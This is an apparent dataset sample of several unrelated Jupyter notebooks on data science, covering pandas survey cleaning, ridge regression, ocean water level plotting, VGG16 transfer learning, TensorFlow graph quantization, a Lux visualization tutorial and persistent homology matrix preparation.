text
stringlengths
2.5k
6.39M
kind
stringclasses
3 values
``` %matplotlib inline import pandas as pd # Import & combine the control & experimental groups! control = pd.read_csv("control.csv") control["group"] = 0 # control experimental = pd.read_csv("experimental.csv") experimental["group"] = 1 # experimental data = pd.concat([control,experimental], ignore_index=True) data.head(1) # It's cleaning time. # Rename the columns data.columns = [ 'timestamp', 'likeable', 'surprising', 'q1', 'q2', 'q3', 'q4', 'q5', 'q6', 'q7', 'q8', 'q9', 'q10', 'age', 'gender', 'edu', 'group' ] data.head() # Drop anyone who didn't respond to Likeable & Surprising data.dropna(subset=['likeable','surprising'], inplace=True) # And drop anyone who didn't answer at least ONE question in Q1-10 data.dropna(subset=['q1','q2','q3','q4','q5','q6','q7','q8','q9','q10'], how='all', inplace=True) # Any other blank Q's to 0 for i in range(10): col = "q" + str(i+1) data[col].fillna(0, inplace=True) # Convert edu to 'none', 'grade', 'high', '2yr', '4yr', 'masters', 'phd' pd.options.mode.chained_assignment = None # Shut up Pandas, I know what I'm doing (I think) print("Before:") print(data["edu"].value_counts(dropna=False)) data["edu"].fillna("none", inplace=True) # if didn't say, it's none rename_edu = { "Grade school/Primary school": "grade", "High school/Secondary school/GED": "high", "2-year college degree (Associate's)": "2yr", "4-year college degree (Bachelor's)": "4yr", "Master's degree": "masters", "PhD or other advanced professional degree": "phd", "None / Don't know / Rather not say": "none" } edu_col = data["edu"] for key, value in rename_edu.items(): edu_col[edu_col==key] = value print("\n\nAfter:") print(data["edu"].value_counts(dropna=False)) # Convert gender to 'm', 'f', 'nb', 'none' data["gender"] = data["gender"].str.lower().str.strip() # strip & lowercase it all print("Before:") print(data["gender"].value_counts(dropna=False)) data["gender"].fillna("none", inplace=True) # if didn't say, it's none # Rename to those 3 rename_gender = { "m": "m", 
"male": "m", "man": "m", "men": "m", "guy": "m", "f": "f", "female": "f", "woman": "f", "w": "f", "gal": "f", "nonbinary": "nb", "non-binary": "nb", "non binary": "nb", "agender": "nb", "questioning": "nb", "genderfluid": "nb", "other": "nb" } gender_col = data["gender"] for key, value in rename_gender.items(): gender_col[gender_col==key] = value # Everything else gets none # coz i hate cleaning data and y'all have a lot of typos gender_col[ ((gender_col!="m") & (gender_col!="f")) & (gender_col!="nb") ] = "none" print("\n\nAfter:") print(data["gender"].value_counts(dropna=False)) # Reset index, because we dropped some people earlier data.index = range(data.shape[0]) data.shape[0] data.to_csv("cleaned.csv") ```
github_jupyter
<h1>Table of Contents<span class="tocSkip"></span></h1> <div class="toc"><ul class="toc-item"><li><span><a href="#Essentially" data-toc-modified-id="Essentially-1"><span class="toc-item-num">1&nbsp;&nbsp;</span>Essentially</a></span><ul class="toc-item"><li><span><a href="#What's-happening?" data-toc-modified-id="What's-happening?-1.1"><span class="toc-item-num">1.1&nbsp;&nbsp;</span>What's happening?</a></span></li><li><span><a href="#weave" data-toc-modified-id="weave-1.2"><span class="toc-item-num">1.2&nbsp;&nbsp;</span>weave</a></span></li><li><span><a href="#unweave" data-toc-modified-id="unweave-1.3"><span class="toc-item-num">1.3&nbsp;&nbsp;</span>unweave</a></span></li><li><span><a href="#inspecting-the-parts-of-the-woven" data-toc-modified-id="inspecting-the-parts-of-the-woven-1.4"><span class="toc-item-num">1.4&nbsp;&nbsp;</span>inspecting the parts of the woven</a></span></li><li><span><a href="#a-bit-more-control-on-how-you-get-your-woven-parts" data-toc-modified-id="a-bit-more-control-on-how-you-get-your-woven-parts-1.5"><span class="toc-item-num">1.5&nbsp;&nbsp;</span>a bit more control on how you get your woven parts</a></span></li></ul></li></ul></div> ``` from owner import int_to_bytes, bytes_to_int # int_to_bytes(bytes_to_int()) bytes_to_int(int_to_bytes(123456)) == 123456 int_to_bytes(7, n_bytes=3) int_to_bytes(255, n_bytes=3) int_to_bytes(256, n_bytes=3) int_to_bytes(256 + 7, n_bytes=3) ``` # Essentially ``` from owner import weave, unweave assert unweave(weave(b'bob and alice')) == b'bob and alice' ``` ## What's happening? Well, here's what's happening by default. First, a weaver is made... ``` from owner import HeadWeaver weaver = HeadWeaver() ``` ## weave When we weave, we get the same original content, but with a bunch of "other junk"... 
``` content = b'--this is where content goes--' extra_info = b'**optional free-from "extra info goes here: It is meant for ownership and dating info.**' w = weaver.weave(content, extra_info) w ``` ## unweave No fret though, we can unjunk the weave. ``` unwoven_content = weaver.unweave(w) assert unwoven_content == content # see that the unwoven content is the same as the original content unwoven_content ``` What does weaving and unweaving do for you? Well, that's up to you. It's just a means to add some information to some content, within the bytes of the content itself, and be able to still access the original content. What you put in the `extra_info` depends on you and your use case. The use case we have in mind here is: I want to prove that some content is mine by posting a hash of it on a block-chain. But if I just hash the content, only the content is represented, not any other information (such as my name etc.). Simple solution to that: Just prepend my name (or any other information) to the raw content. That's what `extra_info` is. Ah... but then I need to know where the original content starts. That's what `offset` is. And then we added a `content_hash` to add extra error-correcting abilities. Let's now have a look at how the woven bytes are parsed. ## inspecting the parts of the woven ``` parts = weaver.unweave_parts(w) parts parts._fields ``` As you see in the print out above, the parts are all given in raw bytes format. If you need them to be interpreted you can do so like this: ``` parts = weaver.unweave_parts(w, interpret_bytes=True) parts ``` The offset tells us where the content actually starts. Here, we know it starts at the 184th byte. ``` parts.offset ``` The ``content_hash`` is the sha256 of the original contents, here presented in hex form. 
``` parts.content_hash parts.extra_info parts.content ``` ## a bit more control on how you get your woven parts ``` import json weaver = HeadWeaver() content = 'This is some text' extra_info = {"name": "Thor Whalen", "date": "2013-12-11"} w = weaver.weave(content.encode(), json.dumps(extra_info).encode()) parts = weaver.unweave_parts(w, interpret_bytes=True, decode_content=True, decode_extra_info=json.loads) parts assert isinstance(parts.extra_info, dict) # I'm now getting extra_info in the form of a dict parts.extra_info assert isinstance(parts.content, str) # content is as a str parts.content ```
github_jupyter
# Ridge regression and model selection Modified from the github repo: https://github.com/JWarmenhoven/ISLR-python which is based on the book by James et al. Intro to Statistical Learning. ## Loading data ``` # %load ../standard_import.txt import pandas as pd import numpy as np import matplotlib.pyplot as plt from sklearn.preprocessing import scale from sklearn.linear_model import LinearRegression, Ridge, RidgeCV, Lasso, LassoCV from sklearn.decomposition import PCA from sklearn.metrics import mean_squared_error %matplotlib inline plt.style.use('ggplot') datafolder = "../data/" def loo_risk(X,y,regmod): """ Construct the leave-one-out square error risk for a regression model Input: design matrix, X, response vector, y, a regression model, regmod Output: scalar LOO risk """ loo = LeaveOneOut() loo_losses = [] for train_index, test_index in loo.split(X): X_train, X_test = X[train_index], X[test_index] y_train, y_test = y[train_index], y[test_index] regmod.fit(X_train,y_train) y_hat = regmod.predict(X_test) loss = np.sum((y_hat - y_test)**2) loo_losses.append(loss) return np.mean(loo_losses) def emp_risk(X,y,regmod): """ Return the empirical risk for square error loss Input: design matrix, X, response vector, y, a regression model, regmod Output: scalar empirical risk """ regmod.fit(X,y) y_hat = regmod.predict(X) return np.mean((y_hat - y)**2) # In R, I exported the dataset from package 'ISLR' to a csv file. df = pd.read_csv(datafolder+'Hitters.csv', index_col=0).dropna() df.index.name = 'Player' df.info() df.head() dummies = pd.get_dummies(df[['League', 'Division', 'NewLeague']]) dummies.info() print(dummies.head()) y = df.Salary # Drop the column with the independent variable (Salary), and columns for which we created dummy variables X_ = df.drop(['Salary', 'League', 'Division', 'NewLeague'], axis=1).astype('float64') # Define the feature set X. 
X = pd.concat([X_, dummies[['League_N', 'Division_W', 'NewLeague_N']]], axis=1) X.info() X.head(5) ``` ## Ridge Regression ``` alphas = 10**np.linspace(10,-2,100)*0.5 ridge = Ridge() coefs = [] for a in alphas: ridge.set_params(alpha=a) ridge.fit(scale(X), y) coefs.append(ridge.coef_) ax = plt.gca() ax.plot(alphas, coefs) ax.set_xscale('log') ax.set_xlim(ax.get_xlim()[::-1]) # reverse axis plt.axis('tight') plt.xlabel('lambda') plt.ylabel('weights') plt.title('Ridge coefficients as a function of the regularization'); ``` The above plot shows that the Ridge coefficients get larger when we decrease lambda. ## Exercises __Exercise 1__ Plot the LOO risk and the empirical risk as a function of lambda. ``` alphas = np.linspace(30,1,100) rcv = RidgeCV(alphas = alphas, store_cv_values=True,normalize=True) rcv.fit(X,y) cv_vals = rcv.cv_values_ LOOr = cv_vals.mean(axis=0) EMPr = [] for a in alphas: ridge.set_params(alpha=a) ridge.fit(scale(X), y) EMPr.append(emp_risk(X,y,ridge)) plt.plot(alphas,LOOr) plt.xlabel('lambda') plt.ylabel('Risk') plt.title('LOO Risk for Ridge'); plt.show() plt.plot(alphas,EMPr) plt.xlabel('lambda') plt.ylabel('Risk') plt.title('Emp Risk for Ridge'); plt.show() ``` __Exercise 2__ Implement and test forward stagewise regression (recall that stagewise and stepwise are different). ``` n,p = X.shape Xsc = scale(X) ysc = scale(y) ``` I'll implement a different variant of forward stagewise, where the correlation updates the current beta vector by adding them. ``` MSEiter = [] res = ysc beta = np.zeros(p) tol = 1e-2 corrmax = 1. while corrmax > tol: res_corr = Xsc.T.dot(scale(res)) / n jmax, corrmax = max(enumerate(np.abs(res_corr)), key=lambda x: x[1]) beta[jmax] = beta[jmax] + res_corr[jmax] res = ysc - Xsc.dot(beta) MSE = np.sum(res**2.) MSEiter.append(MSE) beta lm = LinearRegression() lm.fit(Xsc,ysc) lm.coef_ ```
github_jupyter
# Develop `tide_stn_water_level` Figure Module Development of functions for `nowcast.figures.fvcom.tide_stn_water_level` web site figure module. ``` from contextlib import suppress from datetime import timedelta from pathlib import Path import shlex import subprocess from types import SimpleNamespace import arrow import matplotlib.dates import matplotlib.pyplot as plt import requests import xarray from salishsea_tools import data_tools from salishsea_tools.places import PLACES from nowcast.figures import shared import nowcast.figures.website_theme %matplotlib inline ``` ## `_get_ssh_forecast()` Function ``` def _get_nemo_ssh(place, dataset_url_tmpl): ## TODO: This is a work-around because neither netCDF4 nor xarray are able ## to load the dataset directly from the URL due to an OpenDAP issue dataset_url = dataset_url_tmpl.format(place=place.replace(" ", "")) dataset_id = dataset_url.rsplit('/', 1)[1] ssh_file = Path('/tmp').joinpath(dataset_id).with_suffix('.nc') with ssh_file.open('wb') as f: resp = requests.get(f'{dataset_url}.nc') f.write(resp.content) try: nemo_ssh = xarray.open_dataset(ssh_file) except OSError: raise ValueError(f'NEMO ssh dataset not found for {place}') return nemo_ssh ``` ## `_prep_plot_data()` Function ``` def _prep_plot_data(place, fvcom_ssh_dataset, nemo_ssh_dataset_url_tmpl): # FVCOM sea surface height dataset fvcom_ssh = fvcom_ssh_dataset.zeta.isel( station=[ name.decode().strip().split(maxsplit=1)[1] for name in fvcom_ssh_dataset.name_station.values ].index(place)) fvcom_period = slice( str(fvcom_ssh.time.values[0]), str(fvcom_ssh.time.values[-1]) ) # NEMO sea surface height dataset try: nemo_ssh = _get_nemo_ssh(place, nemo_ssh_dataset_url_tmpl).sel(time=fvcom_period) except ValueError: # No NEMO sea surface height dataset for place nemo_ssh = None # CHS water level observations dataset try: obs_1min = data_tools.get_chs_tides( 'obs', place, arrow.get(fvcom_period.start) - timedelta(seconds=5 * 60), arrow.get(fvcom_period.stop) ) obs = 
xarray.Dataset({ 'water_level': xarray.DataArray(obs_1min).rename({ 'dim_0': 'time' }) }) except TypeError: # Invalid tide gauge station number, probably None obs = None # CHS water level predictions dataset try: pred_place = 'Point Atkinson' if place == 'Sandy Cove' else place pred = data_tools.get_chs_tides( 'pred', pred_place, arrow.get(fvcom_period.start), arrow.get(fvcom_period.stop) ) pred = xarray.Dataset({ 'water_level': xarray.DataArray.from_series(pred).rename({ 'index': 'time' }) }) except TypeError: # Invalid tide gauge station number, probably None pred = None # Change dataset times to Pacific time zone shared.localize_time(fvcom_ssh) with suppress(AttributeError): shared.localize_time(nemo_ssh) with suppress(IndexError, AttributeError): shared.localize_time(obs) with suppress(IndexError, AttributeError): shared.localize_time(pred) # Mean sea level msl = PLACES[place]['mean sea lvl'] return SimpleNamespace( fvcom_ssh=fvcom_ssh, nemo_ssh=nemo_ssh, obs=obs, pred=pred, msl=msl, ) ``` ## `_prep_fig_axes()` Function ``` def _prep_fig_axes(figsize, theme): fig, ax = plt.subplots( 1, 1, figsize=figsize, facecolor=theme.COLOURS['figure']['facecolor'] ) fig.autofmt_xdate() return fig, ax ``` ## `_plot_water_level_time_series()` Function ``` def _plot_water_level_time_series(ax, place, plot_data, theme): with suppress(AttributeError): # CHS sometimes returns an empty prediction dataset if plot_data.pred.water_level.size: plot_data.pred.water_level.plot( ax=ax, linewidth=2, label='CHS Predicted', color=theme.COLOURS['time series']['tidal prediction'] ) with suppress(AttributeError): # CHS sometimes returns an empty observations dataset if plot_data.obs.water_level.size: plot_data.obs.water_level.plot( ax=ax, linewidth=2, label='CHS Observed', color=theme.COLOURS['time series']['tide gauge obs'] ) with suppress(AttributeError): (plot_data.nemo_ssh.ssh + plot_data.msl).plot( ax=ax, linewidth=2, label='NEMO', color=theme.COLOURS['time series']['tide gauge ssh'] ) 
(plot_data.fvcom_ssh + plot_data.msl).plot( ax=ax, linewidth=2, label='FVCOM', color=theme.COLOURS['time series']['vhfr fvcom ssh'] ) legend = ax.legend(prop=theme.FONTS['legend label small']) legend.set_title('Legend', prop=theme.FONTS['legend title small']) _water_level_time_series_labels(ax, place, plot_data, theme) ``` ## `_water_level_time_series_labels()` Function ``` def _water_level_time_series_labels(ax, place, plot_data, theme): ax.set_title( f'Water Level at {place}', fontproperties=theme.FONTS['axes title'], color=theme.COLOURS['text']['axes title'] ) ax.set_xlabel( f'Time [{plot_data.fvcom_ssh.attrs["tz_name"]}]', fontproperties=theme.FONTS['axis'], color=theme.COLOURS['text']['axis'] ) ax.xaxis.set_major_formatter(matplotlib.dates.DateFormatter('%d%b %H:%M')) ax.set_ylabel( 'Water Level above Chart Datum [m]', fontproperties=theme.FONTS['axis'], color=theme.COLOURS['text']['axis'] ) ax.grid(axis='both') theme.set_axis_colors(ax) ``` ## `make_figure()` Function This is is the function that will be called by the `nowcast.workers.make_plots` worker to return a `matplotlib.figure.Figure` object. ``` def make_figure(place, fvcom_ssh_dataset_path, nemo_ssh_dataset_url_tmpl, figsize=(16, 9), theme=nowcast.figures.website_theme): plot_data = _prep_plot_data(place, fvcom_ssh_dataset_path, nemo_ssh_dataset_url_tmpl) fig, ax = _prep_fig_axes(figsize, theme) _plot_water_level_time_series(ax, place, plot_data, theme) return fig ``` ## Render the Figure The `%%timeit` cell magic lets us keep an eye on how log the figure takes to process. Setting `-n1 -r1` prevents it from processing the figure more than once as it might try to do to generate better statistics. 
### Nowcast Figure ``` %%timeit -n1 -r1 from importlib import reload from nowcast.figures import website_theme from salishsea_tools import places reload(website_theme) reload(places) run_type = 'nowcast' run_date = arrow.get('2018-05-09') fvcom_ssh_dataset_path_tmpl = '/opp/fvcom/{run_type}/{ddmmmyy}/vhfr_low_v2_station_timeseries.nc' if run_type == 'nowcast': fvcom_ssh_dataset_path = Path( fvcom_ssh_dataset_path_tmpl.format(run_type=run_type, ddmmmyy=run_date.format("DDMMMYY").lower()) ) else: nowcast_dataset_path = Path( fvcom_ssh_dataset_path_tmpl.format(run_type=run_type, ddmmmyy=run_date.format("DDMMMYY").lower()) ) forecast_dataset_path = Path( fvcom_ssh_dataset_path_tmpl.format(run_type=run_type, ddmmmyy=run_date.replace(days=+1).format("DDMMMYY").lower()) ) fvcom_ssh_dataset_path = '/tmp/vhfr_low_v2_station_timeseries_forecast.nc' cmd = f'ncrcat {nowcast_dataset_path} {forecast_dataset_path} -o {fvcom_ssh_dataset_path}' subprocess.check_output(shlex.split(cmd)) cmd = ( f'ncrename -O -v siglay,sigma_layer -v siglev,sigma_level ' f'{fvcom_ssh_dataset_path} /tmp/{fvcom_ssh_dataset_path.name}') subprocess.check_output(shlex.split(cmd)) fvcom_ssh_dataset = xarray.open_dataset(f'/tmp/{fvcom_ssh_dataset_path.name}') nemo_ssh_dataset_url_tmpl = 'https://salishsea.eos.ubc.ca/erddap/griddap/ubcSSf{place}SSH10mV17-02' fig = make_figure('Sandy Cove', fvcom_ssh_dataset, nemo_ssh_dataset_url_tmpl) ``` ### Forecast Figure ``` %%timeit -n1 -r1 from importlib import reload from nowcast.figures import website_theme from salishsea_tools import places reload(website_theme) reload(places) run_type = 'forecast' run_date = arrow.get('2018-05-09') fvcom_ssh_dataset_path_tmpl = '/opp/fvcom/{run_type}/{ddmmmyy}/vhfr_low_v2_station_timeseries.nc' if run_type == 'nowcast': fvcom_ssh_dataset_path = Path( fvcom_ssh_dataset_path_tmpl.format(run_type=run_type, ddmmmyy=run_date.format("DDMMMYY").lower()) ) else: nowcast_dataset_path = Path( 
fvcom_ssh_dataset_path_tmpl.format(run_type='nowcast', ddmmmyy=run_date.format("DDMMMYY").lower()) ) forecast_dataset_path = Path( fvcom_ssh_dataset_path_tmpl.format(run_type='forecast', ddmmmyy=run_date.format("DDMMMYY").lower()) ) fvcom_ssh_dataset_path = Path('/tmp/vhfr_low_v2_station_timeseries_forecast.nc') cmd = f'ncrcat -O {nowcast_dataset_path} {forecast_dataset_path} -o {fvcom_ssh_dataset_path}' subprocess.check_output(shlex.split(cmd)) cmd = ( f'ncrename -O -v siglay,sigma_layer -v siglev,sigma_level ' f'{fvcom_ssh_dataset_path} /tmp/{fvcom_ssh_dataset_path.name}') subprocess.check_output(shlex.split(cmd)) fvcom_ssh_dataset = xarray.open_dataset(f'/tmp/{fvcom_ssh_dataset_path.name}') nemo_ssh_dataset_url_tmpl = 'https://salishsea.eos.ubc.ca/erddap/griddap/ubcSSf{place}SSH10mV17-02' fig = make_figure('Sandy Cove', fvcom_ssh_dataset, nemo_ssh_dataset_url_tmpl) ```
github_jupyter
<a href="https://colab.research.google.com/github/0201shj/CNN-Cats-Dogs/blob/main/4_2_aug_pretrained_ipynb.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a> ``` from google.colab import drive drive.mount('/content/drive') %matplotlib inline !ls -l !unzip training_data.zip !unzip validation_data.zip import glob import numpy as np import matplotlib.pyplot as plt from tensorflow.keras.preprocessing.image import ImageDataGenerator, load_img, img_to_array, array_to_img IMG_DIM = (150, 150) train_files = glob.glob('training_data/*') train_imgs = [img_to_array(load_img(img, target_size=IMG_DIM)) for img in train_files] train_imgs = np.array(train_imgs) train_labels = [fn.split('/')[1].split('.')[0].strip() for fn in train_files] validation_files = glob.glob('validation_data/*') validation_imgs = [img_to_array(load_img(img, target_size=IMG_DIM)) for img in validation_files] validation_imgs = np.array(validation_imgs) validation_labels = [fn.split('/')[1].split('.')[0].strip() for fn in validation_files] print('Train dataset shape:', train_imgs.shape, '\tValidation dataset shape:', validation_imgs.shape) train_imgs_scaled = train_imgs.astype('float32') validation_imgs_scaled = validation_imgs.astype('float32') train_imgs_scaled /= 255 validation_imgs_scaled /= 255 batch_size = 50 num_classes = 2 epochs = 50 input_shape = (150, 150, 3) from sklearn.preprocessing import LabelEncoder le = LabelEncoder() le.fit(train_labels) # encode wine type labels train_labels_enc = le.transform(train_labels) validation_labels_enc = le.transform(validation_labels) print(train_labels[0:5], train_labels_enc[0:5]) train_datagen = ImageDataGenerator( zoom_range=0.3, rotation_range=50, # rescale=1./255, width_shift_range=0.2, height_shift_range=0.2, shear_range=0.2, horizontal_flip=True, fill_mode='nearest') val_datagen = ImageDataGenerator() # rescale=1./255 train_generator = train_datagen.flow(train_imgs, train_labels_enc, 
batch_size=30) val_generator = val_datagen.flow(validation_imgs, validation_labels_enc, batch_size=20) from tensorflow.keras.applications import vgg16 from tensorflow.keras.models import Model import tensorflow.keras vgg = vgg16.VGG16(include_top=False, weights='imagenet', input_shape=input_shape) output = vgg.layers[-1].output output = tensorflow.keras.layers.Flatten()(output) vgg_model = Model(vgg.input, output) vgg_model.trainable = False for layer in vgg_model.layers: layer.trainable = False vgg_model.summary() import pandas as pd pd.set_option('max_colwidth', -1) layers = [(layer, layer.name, layer.trainable) for layer in vgg_model.layers] pd.DataFrame(layers, columns=['Layer Type', 'Layer Name', 'Layer Trainable']) print("Trainable layers:", vgg_model.trainable_weights) bottleneck_feature_example = vgg.predict(train_imgs_scaled[0:1]) print(bottleneck_feature_example.shape) plt.imshow(bottleneck_feature_example[0][:,:,0]) def get_bottleneck_features(model, input_imgs): features = model.predict(input_imgs, verbose=0) return features train_features_vgg = get_bottleneck_features(vgg_model, train_imgs_scaled) validation_features_vgg = get_bottleneck_features(vgg_model, validation_imgs_scaled) print('Train Bottleneck Features:', train_features_vgg.shape, '\tValidation Bottleneck Features:', validation_features_vgg.shape) from tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten, Dense, Dropout, InputLayer from tensorflow.keras.models import Sequential from tensorflow.keras import optimizers model = Sequential() model.add(vgg_model) model.add(Dense(512, activation='relu', input_dim=input_shape)) model.add(Dropout(0.3)) model.add(Dense(64, activation='relu')) model.add(Dropout(0.3)) model.add(Dense(1, activation='sigmoid')) model.compile(loss='binary_crossentropy', optimizer=optimizers.RMSprop(lr=2e-5), metrics=['accuracy']) model.summary() history = model.fit_generator(train_generator, epochs=50, validation_data=val_generator, verbose=1) f, (ax1, ax2) = 
plt.subplots(1, 2, figsize=(12, 4)) t = f.suptitle('Pre-trained CNN (Transfer Learning) Performance', fontsize=12) f.subplots_adjust(top=0.85, wspace=0.3) epoch_list = list(range(1,51)) ax1.plot(epoch_list, history.history['accuracy'], label='Train Accuracy') ax1.plot(epoch_list, history.history['val_accuracy'], label='Validation Accuracy') ax1.set_xticks(np.arange(0, 51, 5)) ax1.set_ylabel('Accuracy Value') ax1.set_xlabel('Epoch') ax1.set_title('Accuracy') l1 = ax1.legend(loc="best") ax2.plot(epoch_list, history.history['loss'], label='Train Loss') ax2.plot(epoch_list, history.history['val_loss'], label='Validation Loss') ax2.set_xticks(np.arange(0, 51, 5)) ax2.set_ylabel('Loss Value') ax2.set_xlabel('Epoch') ax2.set_title('Loss') l2 = ax2.legend(loc="best") model.save('4_2-pretrained Aug_cnn.h5') ```
github_jupyter
``` import os os.environ['CUDA_VISIBLE_DEVICES'] = '' # !wget https://f000.backblazeb2.com/file/malaya-model/v38/translation/en-ms/base-translation.pb # !wget https://f000.backblazeb2.com/file/malaya-model/v38/translation/en-ms/small-translation.pb # !wget https://f000.backblazeb2.com/file/malaya-model/v38/translation/en-ms/large-translation.pb import tensorflow as tf from tensorflow.tools.graph_transforms import TransformGraph from glob import glob tf.set_random_seed(0) pbs = glob('*.pb') pbs import tensorflow_text import tf_sentencepiece transforms = ['add_default_attributes', 'remove_nodes(op=Identity, op=CheckNumerics, op=Dropout)', 'fold_constants(ignore_errors=true)', 'fold_batch_norms', 'fold_old_batch_norms', 'quantize_weights(fallback_min=-10, fallback_max=10)', 'strip_unused_nodes', 'sort_by_execution_order'] for pb in pbs: input_graph_def = tf.GraphDef() with tf.gfile.FastGFile(pb, 'rb') as f: input_graph_def.ParseFromString(f.read()) print(pb) transformed_graph_def = TransformGraph(input_graph_def, ['Placeholder'], ['greedy', 'beam'], transforms) with tf.gfile.GFile(f'{pb}.quantized', 'wb') as f: f.write(transformed_graph_def.SerializeToString()) quantized = glob('*.pb.quantized') quantized !rm *.pb* # converter = tf.compat.v1.lite.TFLiteConverter.from_frozen_graph( # graph_def_file='test.pb', # input_arrays=['Placeholder', 'Placeholder_1'], # input_shapes={'Placeholder' : [None, 512], 'Placeholder_1': [None, 512]}, # output_arrays=['logits'], # ) # # converter.allow_custom_ops=True # converter.target_spec.supported_ops = [tf.lite.OpsSet.TFLITE_BUILTINS, tf.lite.OpsSet.SELECT_TF_OPS] # converter.target_spec.supported_types = [tf.float16] # converter.optimizations = [tf.lite.Optimize.DEFAULT] # converter.experimental_new_converter = True # tflite_model = converter.convert() # converter.target_spec.supported_ops = [tf.lite.OpsSet.TFLITE_BUILTINS, # tf.lite.OpsSet.SELECT_TF_OPS] # converter.target_spec.supported_types = [tf.float16] # 
converter.optimizations = [tf.lite.Optimize.DEFAULT] # tflite_model = converter.convert() # with open('tiny-bert-sentiment-float16.tflite', 'wb') as f: # f.write(tflite_model) # converter.target_spec.supported_ops = [tf.lite.OpsSet.TFLITE_BUILTINS, # tf.lite.OpsSet.SELECT_TF_OPS] # converter.optimizations = [tf.lite.Optimize.OPTIMIZE_FOR_SIZE] # tflite_model = converter.convert() # with open('tiny-bert-sentiment-hybrid.tflite', 'wb') as f: # f.write(tflite_model) # interpreter = tf.lite.Interpreter(model_path='tiny-bert-sentiment-hybrid.tflite') # interpreter.allocate_tensors() ```
github_jupyter
# Overview of Lux Lux is designed to be tightly integrated with Pandas and can be used as-is, without modifying your existing Pandas code. To enable Lux, simply add `import lux` along with your Pandas import statement. ``` import pandas as pd import lux ``` Lux preserves the Pandas dataframe semantics -- which means that you can apply any command from Pandas's API to the dataframes in Lux and expect the same behavior. For example, we can load the dataset via standard Pandas `read_*` commands. ``` df = pd.read_csv("../data/college.csv") ``` Lux is built on the philosophy that generating useful visualizations should be as simple as printing out a dataframe. When you print out the dataframe in the notebook, you should see the default Pandas table display with an additional Toggle button. ``` df ``` By clicking on the Toggle button, you can now explore the data visually through Lux. You should see three tabs of visualizations recommended to you. Voila! You have generated your first set of recommendations through Lux! Next, we will describe the details of how these recommendations are generated. ## Visualizing Dataframes with _Recommendations_ Recommendations highlight interesting patterns and trends in your dataframe. Lux offers different types of recommendations, known as _analytical actions_. These analytical actions represent different analysis that can be performed on the data. Lux recommends a set of actions depending on the content of your dataframe and your analysis goals and interests (described later). As shown in the example above, by default, we display three types of actions shown as different tabs: - **Correlation** displays relationships between two quantitative variables, ranked by the most to least correlated scatterplots. 
<img src="https://github.com/lux-org/lux-resources/blob/master/doc_img/correlation.png?raw=true" width=400 alt="Example of high/low correlation visualizations"> - **Distribution** displays histogram distributions of different quantitative attributes in the dataframe, ranked by the most to least skewed distributions. <img src="https://github.com/lux-org/lux-resources/blob/master/doc_img/distribution.png?raw=true" width=400 alt="Example of high/low skew distributions"> - **Occurrence** displays bar chart distributions of different categorical attributes in the dataframe, ranked by the most to least uneven bar charts. <img src="https://github.com/lux-org/lux-resources/blob/master/doc_img/category.png?raw=true" width=400 alt="Example of even and uneven category distributions"> ## Seamless Integration with Pandas We see that the information about ACTMedian and SATAverage has a very strong correlation. This means that we could probably just keep one of the columns and still get about the same information. So let's drop the ACTMedian column. ``` df = df.drop(columns=["ACTMedian"]) df ``` Notice how the recommendations are regenerated based on the updated dataframe. This means that we can seamlessly go from doing data transformations to visualizing our dataframes without having to import or export out of any visualization tool. ## Steering Recommendations via User Intent We saw an example of how recommendations can be generated for the dataframe without providing additional information. Beyond these basic recommendations, you can further specify your analysis *intent*, i.e., the data attributes and values that you are interested in visualizing. For example, let's say that you are interested in learning more about the median earning of students after they attend the college. You can set your intent in Lux to indicate that you are interested the attribute `MedianEarning`. 
``` df.intent = ["MedianEarnings"] ``` When you print out the dataframe again, you should see three different tabs of visualizations recommended to you. ``` df ``` In the displayed widget, the visualization on the left represent the visualization that you have specified as the intent. On the right, you see the gallery of visualizations recommended based on the specified intent. Given the current intent represented as C = {<code>MedianEarnings</code>}, additional actions (**Enhance** and **Filter**) are generated. - **Enhance** adds an attribute to intended visualization. Enhance lets users compare the effect the added variable on the intended visualization. For example, enhance displays visualizations involving C' = {<code>MedianEarnings</code>, **added attribute**}, including: - {<code>MedianEarnings</code>, **<code>Expenditure</code>**} - {<code>MedianEarnings</code>, **<code>AverageCost</code>**} - {<code>MedianEarnings</code>, **<code>AverageFacultySalary</code>**}. <img src="https://github.com/lux-org/lux-resources/blob/master/doc_img/overview-4.png?raw=true" width=800 alt="Screenshot of Enhance"> - **Filter** adds an additional filter to the intended visualization. Filter lets users browse through what the intended visualization looks like for different subsets of data. For example, Filter displays visualizations involving C' = {<code>MedianEarnings</code>, **added filter**}, including: - {<code>MedianEarnings</code>, **<code>FundingModel=Public</code>**} - {<code>MedianEarnings</code>, **<code>Region=Southeast</code>**} - {<code>MedianEarnings</code>, **<code>Region=Great Lakes</code>**}. <img src="https://github.com/lux-org/lux-resources/blob/master/doc_img/overview-5.png?raw=true" width=800 alt="Screenshot of Filter"> Lux supports a variety of analysis intent, such as specifying values of interest or encoding preferences, refer to [this page](https://lux-api.readthedocs.io/en/latest/source/guide/intent.html) to learn more about it.
github_jupyter
``` ''' For generate Betti_0 and betti_1 of 2017 dailyAmountMatrices, change the format of all matrices according the format of the http://people.maths.ox.ac.uk/nanda/perseus/ format example: 3: the ambient dimension, i.e., the number of coordinates per vertex. 1 0.01 100: the radius scaling factor k=1, the step size s=0.01, the number of steps N=100 1.2 3.4 -0.9 0.5: the vertex (1.2, 3.4, -0.9) with associated radius r = 0.5 2.0 -6.6 4.1 0.3: the vertex (2.0, -6.6, 4.1) with associated radius r = 0.3 and so on! (http://people.maths.ox.ac.uk/nanda/source/distmat.txt) then use the following command to convert matrix: (path to perseus executable) (complex type) (input filename) (output file string) command example: ./perseus distmat ../data/dailyAmoMatrices/amo2017001.csv ../data/random_regression ''' import pandas as pd import math import numpy as np YEAR = 2017 data_path = "C:/Users/wang.yuhao/Documents/CoinWorks-master/data/dailyAmoMatrices/" def read_csv(file_name, day): names=[] for i in range(20): names.append(str(i)) data = pd.read_csv(file_name, header=None, names=names) data = data/(10^8) + 1 data = data.apply(np.log) row_count = pd.DataFrame({"0": [data.shape[0]]}) print(row_count) param = pd.DataFrame({"0": [0], "1": [1], "2": [101], "3": [2]}) print(param) header = row_count.append(param, ignore_index=True) print(header) data = header.append(data, ignore_index=True) print(data) data.to_csv("C:/Users/wang.yuhao/Documents/CoinWorks-master/data/dailyVrAmoMatrices/" + "vrAmo" + str(YEAR) + '{:03}'.format(day) + ".csv", sep=" ", index=False, header=False) for day in range(1, 2): file_name = data_path + "amo" + str(YEAR) + '{:03}'.format(day) + ".csv" read_csv(file_name,day) from subprocess import check_output 